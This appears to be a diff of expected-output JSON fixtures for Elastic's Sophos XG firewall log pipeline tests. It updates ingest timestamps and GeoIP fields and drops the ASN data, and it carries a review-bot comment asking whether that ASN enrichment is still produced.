"country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, 
@@ -3385,7 +3225,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715164400Z", + "ingested": "2021-12-14T14:54:45.179843117Z", "original": "device=\"SFW\" date=2016-12-02 time=18:50:20 timezone=\"GMT\" device_name=\"SFVUNL\" device_id=C01001K234RXPA1 log_id=050927616005 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Warned\" status=\"\" priority=Information fw_rule_id=2 user_name=\"rich\" user_gp=\"Clientless Open Group\" iap=13 category=\"Search Engines\" category_type=\"Acceptable\" url=\"http://www.google.com/\" contenttype=\"\" override_token=\"\" httpresponsecode=\"\" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=37832 dst_port=80 sent_bytes=0 recv_bytes=0 domain=www.google.com exceptions= activityname=\" Search\" reason=\"\"", "code": "050927616005", "kind": "event", @@ -3411,19 +3251,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, 
@@ -3498,7 +3333,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715172700Z", + "ingested": "2021-12-14T14:54:45.179843492Z", "original": "device=\"SFW\" date=2016-12-02 time=18:50:22 timezone=\"GMT\" device_name=\"SFVUNL\" device_id=C01001K234RXPA1 log_id=050901616006 log_type=\"Content Filtering\" log_component=\"HTTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=2 user_name=\"rich\" user_gp=\"Clientless Open Group\" iap=13 category=\"Search Engines\" category_type=\"Acceptable\" url=\"http://www.google.ca/?gfe_rd=cr\u0026ei=ojxHWP3WC4WN8QeRioDABw\" contenttype=\"text/html\" override_token=\"\" httpresponsecode=\"\" src_ip=192.168.73.220 dst_ip=175.16.199.1 protocol=\"TCP\" src_port=46322 dst_port=80 sent_bytes=0 recv_bytes=619 domain=www.google.ca exceptions= activityname=\"Search\" reason=\"not eligible\"", "code": "050901616006", "kind": "event", @@ -3520,19 +3355,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "user": { 
@@ -3590,7 +3420,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715179Z", + "ingested": "2021-12-14T14:54:45.179843954Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:57 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062910617701 log_type=\"Event\" log_component=\"Firewall Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"Open Group\" auth_client=\"CTA\" auth_mechanism=\"AD\" reason=\"\" src_ip=175.16.199.1 message=\"User elastic.user@elastic.test.com of group Open Group logged in successfully to Firewall through AD authentication mechanism from 175.16.199.1\" name=\"elastic.user@elastic.test.com\" src_mac=", "code": "062910617701", "kind": "event", @@ -3617,19 +3447,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "ip": "175.16.199.1" @@ -3637,19 +3462,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "user": { 
@@ -3707,20 +3527,13 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:44:55.715185Z", + "ingested": "2021-12-14T14:54:45.179844344Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:58 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511418055 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Failed\" priority=Warning user_name=\"elastic.user@elastic.test.com\" connectionname=\"Location-1\" connectiontype=\"0\" localinterfaceip=175.16.199.1 localgateway=\"\" localnetwork=\"175.16.199.1/19\" remoteinterfaceip=175.16.199.1 remotenetwork=\"10.84.234.5/32\" message=\"location-1 - IKE message retransmission timed out (Remote: 175.16.199.1)\"", "code": "062511418055", "kind": "event" } }, { - "log": { - "level": "error" - }, - "message": "IKE_SA timed out before it could be established", - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "1234567890123456", @@ -3736,6 +3549,9 @@ "testhost.local" ] }, + "log": { + "level": "error" + }, "sophos": { "xg": { "device_name": "XG230", @@ -3752,13 +3568,17 @@ "host": { "name": "testhost.local" }, + "message": "IKE_SA timed out before it could be established", "event": { "severity": 3, - "ingested": "2021-12-09T13:44:55.715209200Z", + "ingested": "2021-12-14T14:54:45.179844832Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:59 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062511318057 log_type=\"Event\" log_component=\"IPSec\" log_subtype=\"System\" status=\"Expire\" priority=Error user_name=\"\" connectionname=\"\" connectiontype=\"0\" localinterfaceip=\"\" localgateway=\"\" localnetwork=\"\" remoteinterfaceip=\"\" remotenetwork=\"\" message=\"IKE_SA timed out before it could be established\"", "code": "062511318057", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { 
@@ -3767,19 +3587,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "user": { @@ -3833,7 +3648,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715215200Z", + "ingested": "2021-12-14T14:54:45.179845198Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:00 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063210617704 log_type=\"Event\" log_component=\"My Account Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"Local\" reason=\"\" src_ip=175.16.199.1 message=\"User elastic.user@elastic.test.com logged in successfully to MyAccount through Local authentication mechanism\" name=\"\" src_mac=", "code": "063210617704", "kind": "event", @@ -3851,13 +3666,6 @@ } }, { - "log": { - "level": "notification" - }, - "message": "Avira AV definitions upgraded from 1.0.407794 to 1.0.407795.", - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "1234567890123456", @@ -3873,6 +3681,9 @@ "testhost.local" ] }, + "log": { + "level": "notification" + }, "sophos": { "xg": { "oldversion": "1.0.407794", 
@@ -3890,9 +3701,10 @@ "host": { "name": "testhost.local" }, + "message": "Avira AV definitions upgraded from 1.0.407794 to 1.0.407795.", "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715221700Z", + "ingested": "2021-12-14T14:54:45.179845580Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:01 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=064011517819 log_type=\"Event\" log_component=\"Anti-Virus\" log_subtype=\"System\" priority=Notice status=\"Successful\" oldversion=1.0.407794 newversion=1.0.407795 message=\"Avira AV definitions upgraded from 1.0.407794 to 1.0.407795.\"", "code": "064011517819", "kind": "event", @@ -3903,16 +3715,12 @@ "host", "malware" ] - } - }, - { - "log": { - "level": "informational" }, - "message": "Lease 192.168.110.10 expired", "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "XG", "serial_number": "1234567890123457", @@ -3928,6 +3736,9 @@ "defaulttest.local" ] }, + "log": { + "level": "informational" + }, "sophos": { "xg": { "ipaddress": "192.168.110.10", @@ -3945,13 +3756,17 @@ "host": { "name": "defaulttest.local" }, + "message": "Lease 192.168.110.10 expired", "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715277500Z", + "ingested": "2021-12-14T14:54:45.179846074Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:02 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=063411660022 log_type=\"Event\" log_component=\"DHCP Server\" log_subtype=\"System\" status=\"Expire\" priority=Information ipaddress=\"192.168.110.10\" client_physical_address=\"-\" client_host_name=\"\" message=\"Lease 192.168.110.10 expired\" raw_data=\"192.168.110.10\"", "code": "063411660022", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { 
@@ -3960,19 +3775,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "user": { @@ -4026,7 +3836,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715283800Z", + "ingested": "2021-12-14T14:54:45.179846501Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:03 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063110617710 log_type=\"Event\" log_component=\"SSL VPN Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD\" reason=\"\" src_ip=175.16.199.1 message=\"User elastic.user@elastic.test.com authenticated successfully to login to SSLVPN through AD authentication mechanism\" name=\"\" src_mac=", "code": "063110617710", "kind": "event", @@ -4105,7 +3915,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715289700Z", + "ingested": "2021-12-14T14:54:45.179846882Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:04 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062811617824 log_type=\"Event\" log_component=\"SSL VPN\" log_subtype=\"System\" priority=Information Mode=\"Remote Access\" sessionid=\"\" starttime=0 user_name=\"elastic.user@elastic.test.com\" ipaddress=10.82.234.5 sent_bytes=0 recv_bytes=0 status=\"Established\" message=\"SSL VPN User 'elastic.user@elastic.test.com' connected \" timestamp=1589960866 connectionname=\"\" remote_ip=10.82.234.12", "code": "062811617824", "kind": "event" 
@@ -4118,19 +3928,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "user": { @@ -4185,7 +3990,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715295400Z", + "ingested": "2021-12-14T14:54:45.179847371Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:05 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063010517708 log_type=\"Event\" log_component=\"VPN Authentication\" log_subtype=\"Authentication\" status=\"Failed\" priority=Notice user_name=\"hendrikl\" usergroupname=\"\" auth_client=\"N/A\" auth_mechanism=\"AD,AD,Local\" reason=\"wrong credentials\" src_ip=175.16.199.1 message=\"User elastic01 failed to login to VPN through AD,AD,Local authentication mechanism because of wrong credentials\" name=\"\" src_mac=", "code": "063010517708", "kind": "event", @@ -4199,13 +4004,6 @@ } }, { - "log": { - "level": "notification" - }, - "message": "ATP definitions upgraded from 1.0.0297 to 1.0.0298.", - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "1234567890123456", @@ -4221,6 +4019,9 @@ "testhost.local" ] }, + "log": { + "level": "notification" + }, "sophos": { "xg": { "oldversion": "1.0.0297", 
@@ -4238,13 +4039,17 @@ "host": { "name": "testhost.local" }, + "message": "ATP definitions upgraded from 1.0.0297 to 1.0.0298.", "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715301300Z", + "ingested": "2021-12-14T14:54:45.179847826Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:06 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=066911518017 log_type=\"Event\" log_component=\"ATP\" log_subtype=\"System\" priority=Notice status=\"Successful\" oldversion=1.0.0297 newversion=1.0.0298 message=\"ATP definitions upgraded from 1.0.0297 to 1.0.0298.\"", "code": "066911518017", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -4302,7 +4107,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715307100Z", + "ingested": "2021-12-14T14:54:45.179848197Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:07 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=062009617502 log_type=\"Event\" log_component=\"GUI\" log_subtype=\"Admin\" status=\"Successful\" priority=Information user_name=\"admin\" src_ip=10.83.234.5 syslog_server_name='Logstash' message=\"SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'\"", "code": "062009617502", "kind": "event" @@ -4315,19 +4120,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "user": { 
@@ -4380,7 +4180,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715313Z", + "ingested": "2021-12-14T14:54:45.179848569Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:08 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=062109517507 log_type=\"Event\" log_component=\"CLI\" log_subtype=\"Admin\" status=\"Failed\" priority=Notice user_name=\"root\" src_ip=175.16.199.1 message=\"User 'root' failed to login from '175.16.199.1' using ssh because of wrong credentials\"", "code": "062109517507", "kind": "event", @@ -4388,13 +4188,6 @@ } }, { - "log": { - "level": "notification" - }, - "message": "IPS definitions upgraded from 9.17.09 to 9.17.10.", - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "1234567890123456", @@ -4410,6 +4203,9 @@ "testhost.local" ] }, + "log": { + "level": "notification" + }, "sophos": { "xg": { "oldversion": "9.17.09", @@ -4427,22 +4223,19 @@ "host": { "name": "testhost.local" }, + "message": "IPS definitions upgraded from 9.17.09 to 9.17.10.", "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715318800Z", + "ingested": "2021-12-14T14:54:45.179848935Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:09 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063911517818 log_type=\"Event\" log_component=\"IPS\" log_subtype=\"System\" priority=Notice status=\"Successful\" oldversion=9.17.09 newversion=9.17.10 message=\"IPS definitions upgraded from 9.17.09 to 9.17.10.\"", "code": "063911517818", "kind": "event" - } - }, - { - "log": { - "level": "informational" }, - "message": "Scheduled backup to appliance is successful.", "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "XG", "serial_number": "1234567890123456", @@ -4458,6 +4251,9 @@ "testhost.local" ] }, + "log": { + "level": "informational" + }, "sophos": { "xg": { "device_name": "XG230", 
@@ -4473,13 +4269,17 @@ "host": { "name": "testhost.local" }, + "message": "Scheduled backup to appliance is successful.", "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715324800Z", + "ingested": "2021-12-14T14:54:45.179849347Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:10 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=063311617923 log_type=\"Event\" log_component=\"Appliance\" log_subtype=\"System\" priority=Information backup_mode='appliance' message=\"Scheduled backup to appliance is successful.\"", "code": "063311617923", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "server": { @@ -4550,7 +4350,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:44:55.715330600Z", + "ingested": "2021-12-14T14:54:45.179849797Z", "original": "device=\"SFW\" date=2020-05-18 time=14:39:20 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=062910617703 log_type=\"Event\" log_component=\"Firewall Authentication\" log_subtype=\"Authentication\" status=\"Successful\" priority=Information user_name=\"elastic.user@elastic.test.com\" usergroupname=\"VPN.SSL.Users.elastic\" auth_client=\"IPSec\" auth_mechanism=\"N/A\" reason=\"\" src_ip=10.84.234.38 src_mac=\"\" start_time=1591086575 sent_bytes=0 recv_bytes=0 message=\"User elastic.user@elastic.test.com was logged out of firewall\" name=\"elastic.user@elastic.test.com\" timestamp=1591086576", "code": "062910617703", "kind": "event", 
@@ -4625,7 +4425,7 @@ "event": { "duration": 164000000000000, "severity": 6, - "ingested": "2021-12-09T13:44:55.715336500Z", + "ingested": "2021-12-14T14:54:45.179850178Z", "original": "device=\"SFW\" date=2017-03-16 time=12:56:01 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618014 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Connected\" eventtime=\"2017-03-16 12:56:01 IST\" duration=164000 branch_name=Gaurav Patel recv_bytes=0 sent_bytes=0 message=\"A350196C47072B0/Gaurav Patel is now re-connected after 164000 ms\"", "code": "066811618014", "kind": "event", @@ -4689,7 +4489,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715342400Z", + "ingested": "2021-12-14T14:54:45.179850554Z", "original": "device=\"SFW\" date=2017-03-16 time=12:53:27 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618015 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Disconnected\" eventtime=\"2017-03-16 12:53:27 IST\" duration=0 branch_name=Gaurav Patel recv_bytes=31488 sent_bytes=22368 message=\"A350196C47072B0/Gaurav Patel is now disconnected\"", "code": "066811618015", "kind": "event", @@ -4753,7 +4553,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715348300Z", + "ingested": "2021-12-14T14:54:45.179850950Z", "original": "device=\"SFW\" date=2017-03-16 time=12:46:26 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618016 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Interim\" eventtime=\"2017-03-16 12:46:26 IST\" duration=0 branch_name=NY recv_bytes=0 sent_bytes=0 message=\"A350196C47072B0/NY transfered bytes TX: 0 RX: 0\"", "code": "066811618016", "kind": "event", 
@@ -4762,13 +4562,6 @@ } }, { - "log": { - "level": "notification" - }, - "message": "DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86.", - "tags": [ - "preserve_original_event" - ], "observer": { "product": "XG", "serial_number": "S4000806149EE49", @@ -4784,6 +4577,9 @@ "defaulttest.local" ] }, + "log": { + "level": "notification" + }, "sophos": { "xg": { "device_name": "SG430", @@ -4801,13 +4597,17 @@ "host": { "name": "defaulttest.local" }, + "message": "DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86.", "event": { "severity": 5, - "ingested": "2021-12-09T13:44:55.715354500Z", + "ingested": "2021-12-14T14:54:45.179851424Z", "original": "device=\"SFW\" date=2018-06-06 time=11:12:10 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=063711517815 log_type=\"Event\" log_component=\"DDNS\" log_subtype=\"System\" status=\"Success\" priority=Notice host=test1.customtest.dyndns.org updatedip=10.198.232.86 reason=\"\" message=\"DDNS update for host test1.customtest.dyndns.org was Successful. Updated with IP 10.198.232.86.\"", "code": "063711517815", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "server": { @@ -4828,25 +4628,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 606, - "ip": "175.16.199.1", - "packets": 5 + "packets": 5, + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", 
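Review bot: The regenerated expectation drops the whole `as` object (`"number": 4837`, `"organization": {"name": "CHINA UNICOM China169 Backbone"}`) from the `source`/`destination` blocks in this hunk and in every later geo hunk of this chunk, while the `geo` fields merely change shape (`CN-JL` → `CN-22`, added `city_name`/`country_iso_code`, `Jilin` → `Jilin Sheng`). That pattern looks like the bumped elastic-package shipping a different test GeoIP database rather than a change to the ingest pipeline, but the fixture diff alone cannot distinguish the two, and `source.as`/`destination.as` are enrichment fields that detection content commonly keys on. It would be worth confirming that the pipeline still produces the ASN enrichment when run against a database that carries ASN data, or stating in the commit description why the expected output no longer includes it.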
@@ -4859,19 +4654,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 62841, @@ -4961,7 +4751,7 @@ "event": { "duration": 11000000000, "severity": 6, - "ingested": "2021-12-09T13:44:55.715400500Z", + "ingested": "2021-12-14T14:54:45.179851825Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:37 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=11 fw_rule_id=21 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=0 appfilter_policy_id=0 application=\"HTTP\" application_risk=1 application_technology=\"Browser Based\" application_category=\"General Internet\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol=\"TCP\" src_port=62841 dst_port=80 sent_pkts=6 recv_pkts=5 sent_bytes=459 recv_bytes=606 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"LAN\" srczone=\"LAN\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Stop\" connid=\"1617925280\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010101600001", "kind": "event", 
@@ -4998,25 +4788,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", @@ -5029,19 +4814,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 49144, 
@@ -5131,7 +4911,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715407Z", + "ingested": "2021-12-14T14:54:45.179852223Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:38 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=010101600001 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Allowed\" status=\"Allow\" priority=Information duration=0 fw_rule_id=67 policy_type=1 user_name=\"\" user_gp=\"\" iap=0 ips_policy_id=15 appfilter_policy_id=0 application=\"DNS\" application_risk=1 application_technology=\"Network Protocol\" application_category=\"Infrastructure\" in_interface=\"Port3.400\" out_interface=\"Port2\" src_mac=00:00:00:00:00:00 src_ip=175.16.199.1 src_country_code=R1 dst_ip=175.16.199.1 dst_country_code=SVK protocol=\"UDP\" src_port=49144 dst_port=53 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=175.16.199.1 tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"DMZ\" srczone=\"DMZ\" dstzonetype=\"WAN\" dstzone=\"WAN\" dir_disp=\"\" connevent=\"Start\" connid=\"3360392048\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010101600001", "kind": "event", @@ -5168,25 +4948,20 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 4980, "bytes": 0, - "ip": "175.16.199.1", - "packets": 0 + "packets": 0, + "ip": "175.16.199.1" }, "rule": { "ruleset": "1", 
@@ -5198,19 +4973,14 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "port": 53287, @@ -5290,7 +5060,7 @@ "event": { "duration": 0, "severity": 6, - "ingested": "2021-12-09T13:44:55.715413100Z", + "ingested": "2021-12-14T14:54:45.179852605Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:39 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=010102600002 log_type=\"Firewall\" log_component=\"Firewall Rule\" log_subtype=\"Denied\" status=\"Deny\" priority=Information duration=0 fw_rule_id=29 policy_type=1 user_name=\"\" user_gp=\"\" iap=2 ips_policy_id=0 appfilter_policy_id=0 application=\"\" application_risk=0 application_technology=\"\" application_category=\"\" in_interface=\"Port1\" out_interface=\"Port2\" src_mac=24:01:c7:07:2b:a2 src_ip=175.16.199.1 src_country_code=\"\" dst_ip=175.16.199.1 dst_country_code=\"\" protocol=\"TCP\" src_port=53287 dst_port=4980 sent_pkts=0 recv_pkts=0 sent_bytes=0 recv_bytes=0 tran_src_ip=\"\" tran_src_port=0 tran_dst_ip=\"\" tran_dst_port=0 srczonetype=\"\" srczone=\"\" dstzonetype=\"\" dstzone=\"\" dir_disp=\"\" connid=\"\" vconnid=\"\" hb_health=\"No Heartbeat\" message=\"\" appresolvedby=\"Signature\" app_is_cloud=0", "code": "010102600002", "kind": "event", 
